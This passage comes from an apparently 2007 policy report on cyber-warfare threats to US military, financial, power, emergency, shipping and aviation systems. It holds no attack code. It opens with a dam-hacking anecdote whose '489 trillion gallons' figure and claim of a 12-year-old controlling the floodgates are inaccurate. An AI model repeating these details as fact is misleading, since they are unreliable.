computer system controlling the Roosevelt Dam in Arizona. Federal authorities claimed that the

boy had complete control of the SCADA system that operates the dam’s floodgates, which hold

back about 489 trillion gallons of water. If the gates were opened, the resulting flood would

mostly stay in a flood plain around the cities of Mesa and Tempe, engulfing them with water. In

this instance, in which the dam’s SCADA system was easily breached by a 12-year-old, the

cyber-security risk is much greater than the physical risk, since physically destroying a dam

would require “tons of explosives” according to Secretary of Homeland Security Michael

Chertoff108

.

There are many misconceptions surrounding the security of SCADA systems, and these leave

critical infrastructures vulnerable to attacks from both internal and external sources. While there

is no need to panic, the use of SCADA systems in cyber-warfare is a legitimate concern threat

that must be addressed more fully.

105


<http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Maynor-Graham-up.pdf>. 106


<http://www.securityfocus.com/news/502>. 107


<http://www.securityfocus.com/news/502>. 108



52

3 Targets

53

As we move further into the 21st century, our nation is increasingly threatened by cyber-warfare.

Any foreign nation or terrorist group with a computer can wreak havoc throughout the United

States, threatening anything connected to the internet. This threat is not limited to one specific

group, but could affect global corporations, utilities, transportation systems, the federal

government, and the military. Securing our critical infrastructures should be our chief concern as

the government is the caretaker of our economic well being, security and defense, and social

services.. Before we begin to discuss policy goals for the government to enact, it is vital to

assess potential threats and vulnerabilities to the system as a whole.

3.1 Military and Government

As the keepers of our nation’s defense, the government and military are absolutely critical to the

preservation of our nation, and consequently one of the leading targets for cyber-attack. Existing

threats to the government and military are primarily data theft and data corruption. Since the late

1990’s, there have been several documented data theft attacks on the United States from

unknown foreign nations. Presently, this is the most pressing issue to national security. The

military is also potentially vulnerable on the battlefield to cyber-attack, although many of the

vulnerabilities are electronic attacks rather than cyber-attacks, a distinction that will be clarified.

Lastly, the military faces the prospect of global threats from foreign nations gaining cyber-attack

capabilities that could be used against the nation as a whole or directly on the battlefield.

3.1.1 Data Theft and Corruption

In the modern world, data theft and corruption are taking the place of traditional espionage and

spying. Rather than transporting physical files to obtain government secrets, hackers can simply

break through firewalls and other cyber-defense mechanisms to raid stored data in secure

government systems. This is the greatest threat to our government, and will continue to present

the foremost issue to counter when securing cyberspace.

There have been several historical cases of data theft that have been reported to the general

public. In 1997, a test called Eligible Receiver allowed an NSA ‘red team’ – hackers inside the

organization that try to break into secure systems – to attempt to hack into the Pentagon.

Ultimately they successfully infiltrated the Pentagon network, as well as gained control of

Pacific command center computers, power grids and 911 systems.109

In 1999, the government accidentally stumbled upon a series of data thefts that were collectively

coined Moonlight Maze. Hackers had been systematically infiltrating computers in the

Pentagon, NASA, the Department of Energy, and private universities and research facilities

dating back nearly two years. Data stolen included troop structure as well as military hardware

109


<http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/warnings/>

54

and base configurations. The electronic trail was traced back to Russia, but the sponsor of the

attacks is still unknown.110

A similar series of incidents, known as Titan Rain, resulted in widespread attacks from 2003 to

2005 against targets inside the government, military installations, as well as top level defense

contractors. Although the data stolen was not classified, it included large quantities of sensitive

material that was restricted by export control laws. It is not clear whether the data theft has

ceased or who the culprit behind the attacks is. The data theft was traced back to China, but the

Chinese government refuses to cooperate with US investigations.111

These types of attacks are a continuing threat to the government and military. The Pentagon

announced that in June, hackers managed to break into computers in the Pentagon, including the

computer of the Secretary of Defense, Robert Gates.112

Although the government did not

suggest a culprit, there is some suspicion of Chinese People’s Liberation Army involvement.

Hackers are continuing to penetrate the government, despite the best efforts of defense measures.

Additionally, federal agencies such as the FBI are unable to investigate the sources of the attacks

internationally without foreign approval, which prevents any precise knowledge of the attackers.

Although we do not know of any classified information theft, the data stolen is staggering, and a

major threat to the government.

Similar to data theft is data corruption. Hackers break into computer systems, and are then able

to alter code to perform many different actions. Common corruption includes leaving ‘back

door’ code in place to allow hackers to re-enter previously exploited weaknesses. Compromised

computers will often contain a ‘trojan horse,’ malicious code that in addition to enabling reentry,

will allow hackers to control these computers remotely or shut the computers down.113

Many of

the tools for attack previously described, such as DOS attacks, are reliant on these corrupted

computers in order to work successfully. The combined danger of data theft and corruption

present an ongoing and serious threat to both the government and the military.

3.1.2 Battlefield Cyber-attacks

Direct battlefield threats due to cyber-warfare are hard to identify and evaluate. Some argue that

any data theft by the military or information that is potentially compromised could lead to deaths

on the field114

, but the causal link is slightly stretched. Unlike other cyber-attacks, battlefield

uses of cyber-warfare are only effective when coupled with a physical attack, as in conveying

incorrect troop strength and then ambushing a military unit. Although these cyber-attacks could

lead to casualties, in themselves they are not the most pressing concern. However, as the

110

Ibid. 111

Thornburgh, Nathan (2005). “The Invasion of the Chinese Cyberspies (And the Man Who Tried to Stop Them)”,

Time. 30 October, 2007, < http://www.time.com/time/magazine/article/0,9171,1098961-1,00.html> 112

“Pentagon Admits Security Breach but won’t say who did it” NetworkWorld.com, 30 October, 2007

<http://www.networkworld.com/community/node/19041> 113



Ibid.

55

nation’s military becomes increasingly advanced and reliant upon technology, some fear exists

that these electronic systems could become vulnerable to attack – albeit an electronic attack.

Cyber-attacks, as we have defined them, are primarily attacks launched through the internet in

order to hack into a system for theft, corruption, or control of the compromised computer.

Losing control of a compromised computer can also lead to malicious activities such as DOS

attacks. There is concern for cyber security on the battlefield, as a porous or weak network could

result in distributing poor troop information to soldiers, with the potential for friendly fire

accidents or enemy ambushes.115

While rear areas may depend upon a computer network for command and control, key

information devices on the field are not susceptible to traditional cyber-attacks. A prominent

example is the GPS system. Although initiated as a military system, the widespread proliferation

of GPS has made it a useful navigation system for the military, civilians, and adversaries alike.

The system is based on receivers and satellites, meaning that cyber-attacks on the battlefield

would not interfere with the system, as it is not plugged into the internet. Current GPS

‘blockers’ are questionable in their effectiveness. In Operation Iraqi Freedom, the Iraqi military

had acquired several GPS jammers, which the United States ironically destroyed with GPS

guided missiles.116

This is not to say that the system is not vulnerable, but that the system faces

electronic warfare threats.

Electronic warfare, a distinct from cyber-warfare, is defined by the military as using

electromagnetic pulses to disrupt or destroy enemy systems in contrast to using computer code

and hacking to achieve the same goal. Theoretically, electronic warfare could disrupt GPS

satellites in space, overheat and permanently damage circuitry in electronic devices, control

adversary radio signals, or even misdirect unmanned crafts or robots. 117

Although military

technologies are widely classified, the ability of electronic warfare to damage robots could pose

a threat to the Predator drone and other modern aerial robotics.

This is not to dismiss cyber-attacks as threats to the military, but rather to suggest that on a

soldier level, cyber-attacks are not a direct threat. There is some battlefield communication and

organization through a local network that could be compromised, but soldiers still communicate

per radio, something unhampered by cyber threats. Direct communication and navigation has

not yet crossed into technologies that are vulnerable to cyber-attack. In the future, electronic

warfare may play a preeminent role on the battlefield, but this is beyond the current scope of

cyber-warfare.

115

Krebs, Brian, (2003). “Cyber War Games Tests Future Troops” Washington Post, October 30, 2007.

<http://www.washingtonpost.com/ac2/wp-dyn/A21871-2003Apr23> 116

“ CENTCOM Operation Iraqi Freedom Briefing - 25 March 2003” October 30, 2007.

<http://www.gulfinvestigations.net/document348.html?PHPSESSID=64c6f060d1f4997faf0ff91799fa777f> 117




56

3.1.3 Foreign Threats

Arguably the greatest threat, albeit primarily a future threat, is the growing ability of foreign

nations to conduct aggressive cyber operations against the United States. Cyber-warfare is

widely accessible because of the limited infrastructure required for effective operations. As a

result, many nations including China, Iran, and North Korea are trying to develop means of

attacking the United States. There are more than a dozen nations with credible cyber-warfare

capability, although not all are hostile to the United States.118

However, due to the vast supply of

resources and evolving national strategy, China appears to be the most significant threat in the

growing field of cyber-warfare.

In the past few years, China has increasingly placed emphasis on cyber capabilities in their

national strategy. In 2005, the PLA started to include offensive cyber operations in military

exercises, with the explicit goal of achieving cyber dominance and a first strike capability. In

2006, China added the goal of achieving dominance throughout the electromagnetic spectrum

over its main adversaries by 2050.119

Earlier this year, the Pentagon was reported to release a

document describing China’s cyber capabilities, which included a plan to disable an American

carrier task force. Additionally, China has successfully hacked into the United States defense

networks, as well as Whitehall in Great Britain and Germany’s government systems.120

As our strongest adversary, it is important to examine how China is attempting to achieve their

cyber dominance. First, the PLA has ‘cyber units’ specifically designed in the military to

develop and use cyber attacks. They are essentially military sponsored hacking rings, with the

full backing of the national government. Additionally, the nation is scouring its population to

find the best talent for cyber units. Through education programs for teens and hacking

competitions to recruit talent, the ‘best and the brightest’ are either working for the government

on cyber-research or as independent contractors in order to give the government plausible

deniability. These units are working off of a “virtual guidebook” developed after reading dozens

of western manuals on military tactics and cyber-tactics. 121

Assessing China’s actual cyber-capabilities is difficult at best. China has already shown

proficiency at hacking into foreign government systems, but little else is known. Possibly their

greatest strength is that the United States is increasingly dependent upon electronic systems,

which in turn enlarges the area for vulnerabilities, and increases the risk of China using cyber-

warfare to disrupt America’s technological advantage. Unfortunately, very little unclassified

material is available regarding China’s capabilities. However, the small glimpses released to the

public show a nation arming itself for what could be the Cold War of the 21st century – with

cyber weapons instead of nuclear missiles.

118

“Cyber War Nightmares” (2006), 30 October, 2007.

<http://www.strategypage.com/htmw/htiw/articles/20060829.aspx> 119

Rogin, Josh, (2006). “DOD: China fielding cyberattack units” 30 October, 2007

<http://www.fcw.com/online/news/94650-1.html> 120

Reid, Tim, (2007). “China’s cyber army is preparing to march on America, says Pentagon” The Times. 30

October, 2007.

<http://technology.timesonline.co.uk/tol/news/tech_and_web/the_web/article2409865.ece> 121

Ibid.

57

3.2 Financial Systems as a Target

3.2.1 Overview

There are powerful nations developing cyber-warfare in an attempt to achieve cyber dominance.

If a cyber-war were to erupt, these nations would likely attack our critical financial systems in an

attempt to thwart the U.S. economy. Fortunately, the nations that have developed intensive

cyber-warfare capabilities have a vested interest in the United States economy. Nations such as

North Korea who do not have a strong connection with our economy have yet to pose a serious

threat in the cyber-realm.

A more imminent threat lies in the terrorist organizations that have no current interest in the

welfare of the U.S. economy and often thrive in times of economic turmoil. Organizations such

as al-Qaeda make no attempts to hide the fact that they aim to attack our economy with any

available resources. Osama bin Laden made his goals very clear in December of 2001, stating

“If their economy is destroyed, they will be busy with their own affairs rather than enslaving the

weak peoples. It is very important to concentrate on hitting the U.S. economy through all

possible means." Al Qaeda’s second-in-command, Ayman al-Zawahiri, said in September 2002:

"We will also aim to continue, by the permission of Allah, the destruction of the American

economy […] It is very important to concentrate on hitting the U.S. economy through all

possible means […] look for the key pillars of the U.S. economy. The key pillars of the enemy

should be struck.”122

The United States has an economy nearly 300% larger than Japan’s second largest national

economy.123

This massive economy has become the target of many terrorist and malicious

organizations and could be the targets of nation states in the future. We know there is a motive;

we must uncover and understand the vulnerabilities of this economic target. Condoleezza Rice,

the U.S. Secretary of State, stated in the Partnership for Critical Infrastructure annual meeting in

Washington,

Today, the cyber economy is the economy. And I don't mean the dot coms. I mean

virtually every vital service -- water supply, transportation, energy, banking and finance,

telecommunications, public health. All of these rely upon computers and the fiber-optic

lines, switchers and routers that connect them. Corrupt those networks, and you disrupt

the nation. It is a paradox of our times: the very technology that makes our economy so

dynamic and our military forces so dominating -- also makes us more vulnerable. As the

President's National Security Advisor, I have to worry about that vulnerability. But each

122

Pethokoukis, James. (2007) “So How Goes Bin Laden’s War on the U.S. Economy?” U.S. News & World

Report. 27 Oct 2007. <http://www.usnews.com/blogs/capital-commerce/2007/9/11/so-how-goes-bin-ladens-war-

on-the-us-economy.html> 123

“Data and Statistics”. International Monetary Fund. 17 Oct 2007. 27 Oct 2007.

<http://www.imf.org/external/data.htm#data>

58

corporate CEO has to worry about the fact that a much smaller cyber attack than on the

U.S. could place the very existence of your company at issue.124

It has been established that our economy is a target; a discussion will now follow about the

vulnerabilities of our financial systems.

3.2.2 Direct Attacks on Financial Systems

Financial institutions such as banks and credit unions have historically been known for

protecting critical data. Their business depends on keeping their clients’ money safe and secure.

Given that over half of all major cyber attack incidents in 2001 targeted financial institutions,

cyber-security is a top priority.125

Institutions spend a large percentage of their profits to ensure

the systems handling all of their financial records and transactions are cyber-secure.

Unfortunately, the financial sector has taken a giant step back since the development of high

speed wireless systems.

Electronic funds transfers (EFTs) are exchanged at a volume of over one trillion dollars per day.

Of course, all of the data in these transfers is encrypted, but there are numerous possibilities for

how the transfers made through wireless internet could be vulnerable to hackers. One such

vulnerability was discovered in GSM phones. When making a banking transfer, the data must

cross from GSM wireless encryption to standard internet encryption. In the split second the data

is stored in the gateway between wireless and wired internet, a hacker could intercept an

unencrypted transmission. While the skill level and luck needed to perform such a task are

considerable, so is the reward, with billions of dollars to be stolen.126

Another vulnerability in the transfer of financial information exists in the 180 million miles of

fiber optic cable currently connecting the entire globe. Seth Page, CEO of Oyster Optics,

explains a shocking vulnerability.

“For both public and private networks, optical taps and analytical devices are required

and inexpensive maintenance equipment in common use worldwide today. Various types

of optical taps, however, both off-the-shelf and customized, are also used for corporate

espionage, government espionage, network disruption and other potential terrorist-type

activities. Used nefariously, optical taps allow access to all voice and data

communication transiting a fiber link.”127

This vulnerability may be very problematic because taps can be installed without detection.

Network carriers see glitches similar to those caused by the insertion of an optical tap on a daily

basis. While financial institutions do make efforts to encrypt data transferred over networks,

124 “National Security Advisor Rice on Protecting U.S. Infrastructure”. 22 March 2001. 27 Oct 2007.

<http://www.usembassy.it/file2001_03/alia/a1032210.htm> 125

Glaessner, Thomas, Tom Kellermann, and Valerie McNevin (2002). “Electronic Security: Risk Mitigation In

Financial Transactions”. The World Bank. p 43. 29 Oct 2007.

<http://info.worldbank.org/etools/docs/library/83592/esecurity_risk_mitigation.pdf> 126

“Wireless Vulnerabilities”. Maisonbisson. 24 Sept 2002. 30 Oct 2007.

<http://maisonbisson.com/blog/post/10387/wireless-vulnerabilities> 127

Kabay, M. E. (2003) “Tapping Fiber Optics Gets Easier”. Network World. 29 Oct 2007.

<http://www.networkworld.com/newsletters/sec/2003/0303sec1.html>

59

there are millions of hackers worldwide working for nation-states and terrorist organizations to

crack data encryption.

Financial institutions are an extremely valuable a target for hackers, which is why such a large

percentage of cyber-attacks are made in this sector. The Communications Management

Association (CMA) conducted a survey that revealed thirty-two percent of the UK's top 1,000

public and private institutions acknowledged their institution had suffered a cyber attack ranging

from data theft to infiltration of corporate bank accounts.128

Further, half of the senior workers

considered the attacks a major threat to their institutions’ survival. The financial institutions

must constantly adapt if our economy is to remain safe from a thinking enemy.

3.3 Infrastructure

The United States’ critical infrastructure—power grids, water lines, communications, emergency

response systems, etc.—is one of the most vulnerable and potentially devastating targets

available for enemy states and terrorist groups. This was first discovered in 1997 when the

aforementioned operation known as “Eligible Receiver” used NSA hackers in an attempt to

infiltrate various infrastructure systems. Their ‘red team’ was limited to using computers and

hacking software that were available to the public, but was still “able to infiltrate and take

control of the Pacific command center computers, as well as power grids and 911 systems in nine

major U.S. cities.”129

Another, more distressing, cyber-attack that has been reported happened in the summer of 2001

when the Webmaster for the city of Mountain View, CA recognized an odd site-intrusion pattern.

He contacted the FBI, and upon further investigation it was found that similar attacks had been

happening in multiple cities around the country. The intruders were found to be researching the

cities’ utilities, government offices, and emergency systems. When the sources of the attacks

were traced, the signals seemed to be coming from the Middle East and Southern Asia. This

information became particularly interesting when American intelligence agencies seized Al

Qaeda laptops after the Sept. 11 attacks and found what appeared to be a “broad pattern of

surveillance of U.S. infrastructure.”130

Due to the number of threats on America’s infrastructures

via cyber-warfare, the following presents the history and current dangers that our nation faces.

3.3.1 Power Utilities

Of all critical infrastructures, power utilities are perhaps the most desirable target for enemies

due to their interconnectedness and relative lack of security backups, plans, and software. In

fact, every day large power utilities must fight off hundreds, and even thousands of attackers

attempting to shut down the power system, steal important data about the plant, or gain control of

128

Gwin, Peter. (2001) “Is the Internet the Next Front in the Terror War?” Europe. Issue 410. 129




<http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/warnings/>

60

the regional grid.131

However, due to the natural complexity of the generators and operating

systems, very few successful attacks have occurred. This lack of successful attacks is the main

reason why little effort has been put into defending our infrastructures up to this point.132

Even though only a few successful attacks on utilities have been recorded, that is no reason for

their importance to be overlooked. For example, in 2003 the “Slammer Worm” began to

continually propagate through thousands of unprotected computers. The payload of the

information being sent eventually became so large that it crashed the safety monitoring system at

the Davis-Besse nuclear power plant in Ohio.133

Fortunately the plant had built in redundancies

and therefore the backup security system was not affected. In turn, no long-term damage was

done to either the plant or the surrounding area.

In a more recent event, the Department of Energy’s Idaho Lab conducted an experiment in

March of 2007 in which they were able to remotely destroy a power generator. The team built a

replica of a power plant’s control system, hacked into the operating system, and commanded the

generator to oscillate in a way not natural to the machine’s design. This unbalanced rotation

forced the generator to release significant amounts of smoke and eventually shut down, breaking

the generator.134

The experiment was done in order to prove the vulnerability of our power grids

if an enemy obtains the necessary security codes and generator specifications.

3.3.1.1 Why is the Power Grid so Vulnerable?

The basis of problems within the power grid stems from the fact that all power systems within

the United States are interconnected, yet the owners and operators of each individual power plant

rarely communicate security weaknesses to each other. The problems continue when the utility

companies try to improve their security systems, yet the research and information needed is

scarce due to the limited information offered by government agencies. This lack of information

leads to utility executives making “security-related decisions on the basis of sparse, uncertain, or

anecdotal information.”135

Because the communication between government agencies and

power utilities is so poor, the industry has a naturally weak foundation due to a lack of security.

This raises the question of why the utility companies don’t take the initiative and fund their own

security research. Because the power companies have faced economic struggles in the past

decade, they are all now in competition with each other to remain functional. Because of this,

131

Shainker, R. “Electric Utility Responses to Grid Issues.” IEEE Power & Energy Magazine. March/April 2006: 32.

24 Oct. 2007

<http://www.lib.ncsu.edu:2178/iel5/8014/33609/01597993.pdf?tp=&arnumber=1597993&isnumber=33609> 132

“Cyberwarfare on the Electricity Infrastructure.” Office of Scientific and Technical Information. 12 Sep. 2007.

< http://www.osti.gov/bridge/product.biblio.jsp?osti_id=769245> 133

Poulsen, K. “Slammer worm crashed Ohio nuke plant network.” Security Focus. 19 August 2003. 12 Sep. 2007.

< http://www.securityfocus.com/news/6767> 134



135


32. 24 Oct. 2007


61

many companies are unable to spare the resources for research.136

However, some individual

power utilities have pioneered the field and have found some useful information. This

information has not led to an overall improvement in cyber-security, though, due to the lack of

“effective technology transfer and broad industry support.”137

This simply reflects the fact that

individual companies do not share their research findings, and in turn, most are unprotected.

This causes a problem because “cyber-security is only as strong as the ‘weakest link’ in the chain

of interconnected information and communication systems that utilities use.”138

Because of this

dilemma, Richard Clarke, former White House Cyber-Security Advisor, says that this is the one

sector that federal regulation makes sense. He believes that if the government does not step in

and set a standard for security then the companies are not going to do it themselves. Clarke

continues by stating, “For once, we have the companies saying they want it to be regulated, so

that they're all required to do it simultaneously. There's the even playing field, and no one has

competitive disadvantage by improving security.”139

While a lack of cyber-security research is the main reason for the vulnerability in the power

utility field, other problems also exist. One such problem is the sheer size and

interconnectedness of the American power system. In some ways it is both a curse and a gift. It

is a curse because it contains 200,000 miles of high-powered lines, making the entire system

impossible to defend against a terrorist attack. In fact, as the power grids continue to grow and

become more interconnected, the vulnerability of the systems will continue to increase due to the

number of entry points. However, the system’s size is a gift in the sense that if a terrorist

organization were to take over a power grid, they would only be able to affect a specific region.

This would cause economic damage to the attacked area, but not cripple the entire country’s

economy if the power was restored within a few days.140

Another source of vulnerability is the ever-changing business practices that are being employed

by the power companies. Many are turning to third-party vendors for administrative services

such as payroll and accounting. This means the power station’s control system may

inadvertently be connected to the vendor’s network. This can cause a problem because the third-

party’s security system may not be firewalled as robustly as the power plant’s control center,

which opens the control center to attack via the vendor’s network.141

136

Interview. Richard Clarke. “Cyber-war!.” PBS: Frontline. April 2003. 29 Oct. 2007



32. 24 Oct. 2007


Ibid. 139




31. 24 Oct. 2007


141

Id. at 35

62

3.3.1.2 What is Being Done?

In 2000, the Energy Information Security (EIS) program was developed by the Electric Power

Research Institute to provide individual utilities with the tools they could use to enhance their

own security programs. This included cyber-security awareness training, information sharing,

and risk management protocols. The program has led to early exploratory work on fast

encryption technologies to protect data and control systems.142

However, as Clarke points out,

tools similar to the ones that EIS provided for the utilities’ systems were too difficult to install,

took too long to install, or the system would end up with an incompatibility and another problem

was then created.143

Therefore, the EIS program has not lead to any significant improvements in

cyber-security other than fast encryption research.

Another attempt at utility cyber-security happened in 2004 when the Department of Homeland

Security established the Process Control Systems Forum (PCSF). The Forum focuses on “threats

to the computerized automated control systems that underlie operation of most of the country’s

critical infrastructure, including the electric power grid.”144

The Forum, in other words, is

gathering security knowledge that has been obtained in different infrastructure fields, and is

attempting to stimulate communication between the utility companies in order to increase the

nation’s infrastructure security.

Although some positive results have come from these programs, the ever-growing power grid

and constantly-improving terrorist techniques and knowledge call for a larger, more

comprehensive approach to solving the cyber-security dilemma. After gathering security

information from over 60 different utilities and government organizations, the PowerSec

Initiative was formed in an attempt to map the strengths and weaknesses of the power system.

From the information that has and will be gathered, PowerSec is able to “evaluate the industry’s

current cyber-attack readiness, identify gaps in this readiness, and specify existing best practices

for filling these gaps.”145

Through this program, the power utility industry will eventually be

able to know exactly what does and does not work in protecting their systems.

3.3.2 Emergency Response

“Eligible Receiver” has been the only recorded instance in America in which a 911 system has

been taken over. The emergency response system was shut down for about an hour in Estonia

142


35-6. 24 Oct. 2007





34. 24 Oct. 2007



36. 24 Oct. 2007


63

when Russia launched its DoS attack against the Baltic Country. No research in the field has

been published.

3.3.3 Communications

Although no loss of communications systems has been recorded in America, Homeland Security

and Defense Telecommunication Systems spending will increase from $15.2b in 2004 to $21b by

2009 in order to expand the network in case of cyber-attack.146

Estonia lost most of its

international communication ability for a few days after the Russian DoS attack. No research in

the field has been published.

3.4 Transportation Systems as a Target

According to Joseph Szyliowicz, a member of the Transportation Research Board, “cyber

warfare is of direct relevance to transportation, given the ever-growing dependence on modern

information, tracking, and data processing systems by transportation companies and agencies.”

147

Transportation systems could conceivably be an appealing target to potential cyber-attackers due

to the integral role they play in the economy. Szyliowicz notes that transportation accounts for

over 10 percent of the nation’s gross domestic product. The recent history of conventional

terrorism also suggests that cyber-attackers may choose to target transportation systems,

provided feasible opportunities exist. Eighteen of the twenty-five major terrorist attacks from

1983 to 2001 “involved the use use of transportation vehicles as weapons, and another five

involved attacks on planes.”148

At present, the aviation system is more at risk of a focused cyber-attack than any other

component of the nation’s transportation infrastructure. Other transportation networks, such as

urban public transit systems, rely less on computer systems to function. Ports and shipping

networks may be open to certain cyber-attacks with limited scope, but these vulnerabilities seem

to pale in comparison to physical vulnerabilities, and cyber-attacks on these networks have been

the subject of relatively little research. Following a discussion of public transit systems and

shipping networks, this assessment focuses on aviation systems as a target of cyber-attacks.

146

“Homeland Security and Defense Telecommunications Spending to Increase 40 Percent by 2009.” Business

Wire. 3 August 2004. 28 Oct. 2007.

<http://findarticles.com/p/articles/mi_m0EIN/is_2004_August_3/ai_n6139915> 147

Szyliowicz, Joseph S. (2004).International transportation security. Review of Policy Research. 21 148

Ibid

64

3.4.1 Public Transit Systems

Public transit systems, such as buses, metros, light rail, and ferries, do not appear to be a likely

target of cyber-attacks. They are generally manually controlled, and can be operated

independently of any centralized computer systems or the Internet.

Worldwide Terrorist Attacks on Public Transit, 1980-20053

Ambushes

Hijackings

Misc.

Shootings

Bombs

Other explosives

(e.g. grenades,

rockets and

landmines)

There were 235 attempted terrorist attacks on public transit systems around the world from 1980

to 2005, but none of those attempts used electronic methods of attack or targeted any computer

systems149

. Their main vulnerability to cyber-attacks stems from their use of communications

and power systems; both of those systems were discussed previously in this report.

3.4.2 Shipping Networks

To date, studies of the risk of cyber-attacks on ports and domestic freight and shipping networks

have been mostly speculative. It appears the threat cyber-attacks currently pose to shipping

networks is small compared to other areas of the transportation infrastructure. As with other

areas of the national infrastructure, shipping networks will become more vulnerable to cyber-

attacks as they rely more on computer systems.

According to a 2003 Transportation Research Board report, the nation’s shipping infrastructure

is a fragmented patchwork of private companies “operating different modes of transport (e.g.,

149

Pike, J. (2007, July 7). Chronology of terrorist attacks against public transit. Retrieved October 30, 2007, from

Global Security Web site: http://www.globalsecurity.org/security/ops/mass-transit-chron.htm

Figure 3.1

65

ship, truck, train, air)” with a small degree of overall system coordination and varying local, state

and federal regulations150

. A breakdown of the industry by transportation mode is shown below.

Figure 3.2: Value and Tonnage of Domestic Freight Shipments

151

The freight industry’s current use of computer systems is largely focused on replacing paper

manifest documents with electronic versions. In the maritime and air shipping sectors, freight

carriers are now allowed the option of submitting manifests electronically to reduce their cargo’s

processing time. Participation in a similar system was made mandatory in January, 2007 for

truck carriers entering the country; carriers can enter information through the Internet or

electronic data interchange (EDI)152

.

This could potentially introduce the ability of cyber-attackers to gain access to shipping

manifests, but no easily obtainable data exists to suggest that this is viable. The risk is mitigated

by the fact that in a regime of voluntary participation, as is the case with maritime and air

shipping, carriers often opt to use traditional paper manifests. In the case of the trucking

industry, for example, only 4 to 9 percent of incoming trucks filed electronic manifests before

participation was made mandatory. In the trucking industry in particular, changes to the type of

cargo and the carrier’s route are frequent153

.

In the future, one source of vulnerability could result from the use of electronic container tags

and seals. Electronic tags would store information on a container’s contents, while electronic

seals would signal whether a container had been opened or tampered with. These technologies

150

Transportation Research Board. (2003). Cybersecurity of freight information systems: A scoping study

Washington, D.C.: Transportation Research Board. 151



Moore, J. (2007 February 26). FCW.com. Retrieved October 25, 2007, from Freight security programs and test

projects proliferate Web site: http://www.fcw.com/print/13_5/news/97727-1.html 153

Moore, J. (2007 February 26). FCW.com. Retrieved October 25, 2007, from A long haul for freight security Web

site: http://www.fcw.com/print/13_5/news/97727-1.html

66

are in the planning phases,154

so it isn’t clear exactly how viable it would be to exploit these

electronic devices.

The most substantial cyber-security assessment of the shipping network is found in the 2003

Transportation Research Board report discussed above155

. That report outlined three possible

cyber-attack scenarios.

The first scenario involved a denial-of-service attack on freight information systems, such as

those used by customs agencies. However, the fragmented nature of the freight industry may

help reduce the damage of a denial-of-service attack. The Transportation Research Board

concluded that more research needs to be done, but these attacks would likely be “easiest to

perpetrate but the least damaging”.

The two other scenarios do not involve pure cyber-attacks, but rather the use of cyber-attacks to

strengthen a conventional attack. Attackers could conceivably use electronic manifest

information to intercept a hazardous materials shipment, or plant false manifest information to

disguise a shipment of weapons or hazardous materials. The Transportation Review Board

concluded the latter case “may be the least likely, and the IT role in the attack may not be

central.” Because these technologies are largely in the test phase, there are no case studies or

assessments of the feasibility of this scenario.

3.4.3 Air Transportation Networks

At present, the aviation system uses computer technologies more heavily than any other

component of the nation’s transportation infrastructure. The Federal Aviation Administration’s

air traffic control system has been described by the Government Accountability Office as “a vast

network of computer hardware, software, and communications equipment156

.”

The FAA estimates that the air transportation industry accounts for 5.4 percent of the nation’s

GDP. On an average day, nearly 2 million passengers fly in U.S. airspace, and up to 7,000

civilian and military aircraft are aloft over the U.S. at any given time157

. Only one would need to

be targeted in a cyber-attack for an impact to be felt on the economy and public perception, even

if the attack did not result in physical damage.

154





Government Accountability Office. (2003). Information security: Progress made, but Federal Aviation

Administration needs to improve controls over air traffic systems. Washington, D.C.: Government Accountability

Organization. 157

FAA Air Traffic Organization. (2006). Moving America safely: 2005 annual performance report Washington,

D.C.: Federal Aviation Administration.

67

Figure 3.3: FAA Traffic Situation Display of Civilian and Military Aircraft

158

3.4.3.1 Aircraft Internal Electronic Control Systems

One potentially serious, but largely unrealistic vulnerability to cyber-attack is introduced by the

reliance of commercial aircraft on electronic flight control systems. Many newer commercial

aircraft use electronic fly-by-wire (FBW) control systems, including, as of 2001, 2,300 out of

11,000 aircraft made by Boeing and Airbus, the two most popular manufacturers.159

In these

FBW systems, the cockpit is connected to the plane’s wing and tail control mechanisms by solid

state electrical control systems instead of by direct mechanical or hydraulic connections. In some

planes, such as the Boeing 777 and the Airbus A380, there is no hydraulic or mechanical backup

control system, and the pilot cannot completely disable the plane’s computers and bypass the

FBW system160

.

However, in commercial FBW aircraft, the pilot can still disable automatic navigation systems

and manually input flight instructions to the FBW system. This implies there is no way for a

commercial aircraft to be electronically hijacked while it is airborne. Systems allowing

authorities to remotely control a commercial aircraft in an emergency have been conceived, but

industry leaders have concluded these systems would introduce more vulnerabilities than the

158



Organization. 159

Wald, M. L. Can Computers Foil Air Pirates?. (2002, April 11). New York Times 160

Alford, L. (2000). Cyber warfare: Protecting military systems. Acquisition Review Quarterly, Spring 2000

volume

68

benefit would warrant161

. Also, in 1993, one study concluded that fears of electromagnetic

radiation disrupting an aircraft’s electrical control system were “unfounded”162

.

The vulnerability of the FBW system’s software to the insertion of malicious code is another

conceivable risk factor, but the system’s built-in redundancies make this impractical for a cyber-

attacker to exploit. Airbus uses a software-based approach, in which several teams of software

developers develop unique implementations of the FBW software from a common set of

specifications. The multiple implementations are run in parallel in the final design, and a voting

system is used to choose the most recommended output163

. This means any attempt to insert

malicious code into an Airbus flight control system from the inside would require “renegade”

software developers to be on a majority of the development teams.

Boeing’s 777 uses a hardware-based approach instead in its “triple-triple redundant” FBW

system, largely similar to that of the newer 787. There are three independent, isolated flight

computer channels, and each channel has three independently-powered “computer lanes” with

three dissimilar microprocessors. Among other things, this means the software code is compiled

in three different ways; according to the system’s design specifications, this dissimilar

redundancy should reduce the risk of hardware being compromised by a factor of one million164

.

It is conceivable that as future aircraft rely more heavily on computer systems, they may become

more vulnerable to cyber-attacks. At present, though, disrupting or hijacking a commercial

aircraft’s navigation system is infeasible to the extent that the risk of a cyber-attack to an

aircraft’s computer system is far outweighed by the risk of conventional attacks. Cyber-attackers

are likely to look elsewhere for a more practical target.

3.4.3.2 Air Traffic Control System

The nationwide air traffic control system is more exposed to cyber-attack than individual aircraft

are, and is accordingly a more realistic target. The most recent Government Accountability

Office report on the FAA’s cyber-security, published in 2005, found that despite ongoing efforts

to improve information security, the agency’s computer systems were “vulnerable to

unauthorized access, use, modification, and destruction that could disrupt aviation operations.165

”

161

Wald, M. L. Can Computers Foil Air Pirates?. (2002, April 11). New York Times 162

Clough, B.T., Cope, B., & Donley, S. (1993). Microwave induced upset of digital flight control systems. Digital

Avionics Systems Conference. 12, 179-184. 163

Greenwell, W.S. and J.G. Alsbrooks (2007). Excerpt From "Digital Control Systems". Retrieved November 3,

2007, from IEEE Computer Society Web site:

